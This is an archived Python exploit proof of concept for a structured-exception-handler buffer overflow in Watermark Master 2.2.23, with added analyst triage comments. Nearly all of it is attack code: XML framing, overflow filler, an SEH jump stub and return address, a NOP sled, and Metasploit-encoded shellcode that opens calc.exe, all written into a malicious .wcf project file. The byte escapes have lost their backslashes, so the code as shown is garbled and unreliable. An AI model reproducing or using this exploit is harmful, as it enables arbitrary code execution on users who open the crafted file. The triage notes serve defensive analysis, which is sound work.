
Watermark Master Buffer Overflow SEH

Posted on 03 November 2013

#!/usr/bin/python
# Exploit Title:Watermark Master Buffer Overflow (SEH)
# Date found: 31.10.2013
# Exploit Author: metacom
# URL:http://www.videocharge.com/download.php
# Software Link:www.videocharge.com/download/WatermarkMaster_Install.exe
# Version: 2.2.23
# Vulnerable products:Watermark Master and Watermark Master + SDK
# Tested on: Windows XP SP3
# Poc video demo : http://bit.ly/19enbvN
#
# Review notes (analyst reading of this archived PoC, added for triage):
# - Python 2 only: the final `print "..."` is a print statement.
# - The backslash of every `\xNN` escape was lost when the listing was
#   archived, so "x41" below is a three-character literal rather than
#   byte 0x41.  The decoded readings in the comments describe the bytes the
#   original script encoded, not what this text produces verbatim.
# - The artifact written is a Watermark Master project file (crash.wcf):
#   an XML document `<config ver="2.2.23.00">` whose `head` part stops inside
#   the opening quote of `<Value name="SourcePath" type="8" value="`, so the
#   whole of `buffer` and `shellcode` lands in that single attribute value;
#   `end` closes the attribute and the document.
# - Triage indicators grounded in this file: a .wcf whose SourcePath
#   attribute is roughly 10 KB long and consists mostly of repeated single
#   bytes (0x41, 0x90, 0xCC), and/or the unusual element
#   `<cols name="Romania Security Team"/>` that `end` inserts.
# - Mitigation lies on the parser side (a bounded copy of the attribute
#   value); operationally, .wcf project files from untrusted sources are
#   hostile input for the affected 2.2.23 builds.

from struct import pack

# `head`, decoded (0x0A shown as \n):
#   <?xml version="1.0" encoding="Windows-1252" ?><config ver="2.2.23.00">\n\n
#   <cols name="Files"/>\n\n<cols name="Profiles">\n\n<Property name="Profile">\n\n
#   <cols name="Watermarks"/>\n\n<cols name="Timelines"/>\n\n<cols name="Streams">\n\n
#   <Property name="Stream">\n\n<Value name="SourcePath" type="8" value="
# The document is left open inside the SourcePath attribute value.
head=("x3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31x2Ex30"
      "x22x20x65x6Ex63x6Fx64x69x6Ex67x3Dx22x57x69x6Ex64x6Fx77x73x2D"
      "x31x32x35x32x22x20x3Fx3Ex3Cx63x6Fx6Ex66x69x67x20x76x65x72x3D"
      "x22x32x2Ex32x2Ex32x33x2Ex30x30x22x3Ex0Ax0Ax3Cx63x6Fx6Cx73x20"
      "x6Ex61x6Dx65x3Dx22x46x69x6Cx65x73x22x2Fx3Ex0Ax0Ax3Cx63x6Fx6C"
      "x73x20x6Ex61x6Dx65x3Dx22x50x72x6Fx66x69x6Cx65x73x22x3Ex0Ax0A"
      "x3Cx50x72x6Fx70x65x72x74x79x20x6Ex61x6Dx65x3Dx22x50x72x6Fx66"
      "x69x6Cx65x22x3Ex0Ax0Ax3Cx63x6Fx6Cx73x20x6Ex61x6Dx65x3Dx22x57"
      "x61x74x65x72x6Dx61x72x6Bx73x22x2Fx3Ex0Ax0Ax3Cx63x6Fx6Cx73x20"
      "x6Ex61x6Dx65x3Dx22x54x69x6Dx65x6Cx69x6Ex65x73x22x2Fx3Ex0Ax0A"
      "x3Cx63x6Fx6Cx73x20x6Ex61x6Dx65x3Dx22x53x74x72x65x61x6Dx73x22"
      "x3Ex0Ax0Ax3Cx50x72x6Fx70x65x72x74x79x20x6Ex61x6Dx65x3Dx22x53"
      "x74x72x65x61x6Dx22x3Ex0Ax0Ax3Cx56x61x6Cx75x65x20x6Ex61x6Dx65"
      "x3Dx22x53x6Fx75x72x63x65x50x61x74x68x22x20x74x79x70x65x3Dx22"
      "x38x22x20x76x61x6Cx75x65x3Dx22")

# Encoder output exactly as the author's command below produced it.  The
# `-b` list names the bytes the encoder was told to avoid: NUL, LF, CR, '<',
# '"' and '&' — i.e. the characters that would terminate or break an XML
# attribute value, which is where this payload is embedded.
#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai
#-b 'x00x0ax0dx3cx22x26' -t c
shellcode = ("xbbx80xa3x02xb2xdaxccxd9x74x24xf4x5ex31xc9xb1"
             "x33x31x5ex12x03x5ex12x83x6ex5fxe0x47x92x48x6c"
             "xa7x6ax89x0fx21x8fxb8x1dx55xc4xe9x91x1dx88x01"
             "x59x73x38x91x2fx5cx4fx12x85xbax7exa3x2bx03x2c"
             "x67x2dxffx2exb4x8dx3exe1xc9xccx07x1fx21x9cxd0"
             "x54x90x31x54x28x29x33xbax27x11x4bxbfxf7xe6xe1"
             "xbex27x56x7dx88xdfxdcxd9x29xdex31x3ax15xa9x3e"
             "x89xedx28x97xc3x0ex1bxd7x88x30x94xdaxd1x75x12"
             "x05xa4x8dx61xb8xbfx55x18x66x35x48xbaxedxedxa8"
             "x3bx21x6bx3ax37x8exffx64x5bx11xd3x1ex67x9axd2"
             "xf0xeexd8xf0xd4xabxbbx99x4dx11x6dxa5x8exfdxd2"
             "x03xc4xefx07x35x87x65xd9xb7xbdxc0xd9xc7xbdx62"
             "xb2xf6x36xedxc5x06x9dx4ax39x4dxbcxfaxd2x08x54"
             "xbfxbexaax82x83xc6x28x27x7bx3dx30x42x7ex79xf6"
             "xbexf2x12x93xc0xa1x13xb6xa2x24x80x5ax0bxc3x20"
             "xf8x53")

# Attribute-value filler: 516 bytes of 0x41, a 4-byte stub, the 4-byte
# little-endian address the author annotates, then 100 bytes of 0x90.
buffer="x41" * 516
buffer+="xebx06x90x90"#
buffer+=pack('<I',0x02700fee)#0x02700fee : popad # jmp ebp
buffer+="x90" * 100
# NOTE(review): this filler is sized from len(buffer) alone (624 bytes once
# the escapes are restored) and is appended to `shellcode`, so it does not
# pad the whole payload to 10000 bytes — the written file is larger than that.
shellcode+="xCC" * (10000 - len(buffer))

# `end`, decoded (0x0A shown as \n):
#   "/>\n\n</Property>\n\n</cols>\n\n<cols name="Romania Security Team"/>\n\n
#   </Property>\n\n</cols>\n\n</config>
# Closes the SourcePath attribute and the remaining open elements.
end=("x22x2Fx3Ex0Ax0Ax3Cx2Fx50x72x6Fx70x65x72x74x79x3Ex0Ax0Ax3Cx2F"
     "x63x6Fx6Cx73x3Ex0Ax0Ax3Cx63x6Fx6Cx73x20x6Ex61x6Dx65x3Dx22x52x6F"
     "x6Dx61x6Ex69x61x20x53x65x63x75x72x69x74x79x20x54x65x61x6Dx22x2F"
     "x3Ex0Ax0Ax3Cx2Fx50x72x6Fx70x65x72x74x79x3Ex0Ax0Ax3Cx2Fx63x6Fx6C"
     "x73x3Ex0Ax0Ax3Cx2Fx63x6Fx6Ex66x69x67x3E")

# Full document: prologue/skeleton, attribute filler, payload, closing tags.
off= head + buffer + shellcode + end

# Writes the assembled document to the current directory.
# NOTE(review): the file is opened in text mode, so on Windows the embedded
# 0x0A bytes would presumably be written as CRLF — verify against a captured
# sample before building byte-exact signatures.  The bare `except:` also
# hides the real cause of a failure (permissions, path, etc.).
try:
    out_file = open("crash.wcf",'w')
    out_file.write(off)
    out_file.close()
    print("[*] Malicious wcf file created successfully")
except:
    print "[!] Error creating file"

 
